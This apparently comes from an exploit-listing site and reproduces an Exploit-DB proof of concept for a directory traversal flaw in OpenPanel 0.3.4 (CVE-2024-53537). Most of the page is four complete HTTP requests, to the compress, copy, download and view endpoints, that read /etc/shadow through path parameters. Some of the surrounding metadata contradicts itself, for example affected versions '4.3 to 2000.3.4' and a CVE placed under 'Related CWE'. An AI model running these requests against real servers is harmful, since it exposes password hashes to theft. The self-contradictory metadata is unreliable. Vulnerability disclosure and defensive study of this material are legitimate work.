header-logo
Suggest Exploit
vendor:
OpenPanel
by:
Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
6.1
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: OpenPanel
Affected Version From: 4.3
Affected Version To: 2000.3.4
Patch Exists: NO
Related CWE: CVE-2024-53537
CPE: a:openpanel:openpanel:0.3.4
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=55075
Platforms Tested: macOS
2024

OpenPanel 0.3.4 – Directory Traversal

The OpenPanel version 0.3.4 is vulnerable to directory traversal. By exploiting this vulnerability, an attacker can traverse the directories outside the intended location and gain unauthorized access to sensitive files. This vulnerability has been assigned CVE-2024-53537.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of OpenPanel that addresses the directory traversal issue. Additionally, access controls and input validation mechanisms should be implemented to restrict unauthorized access.
Source

Exploit-DB raw data:

# Exploit Title: OpenPanel 0.3.4 - Directory Traversal 
# Date: Dec 05, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53537

### Compress Function ###
POST /compress_files HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar

### Copy Function ###
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers


###  Download Function ###
GET /download_file/shadow?path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers


### View Function ### 
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

Navigation

Suggest Exploit

Services By CQR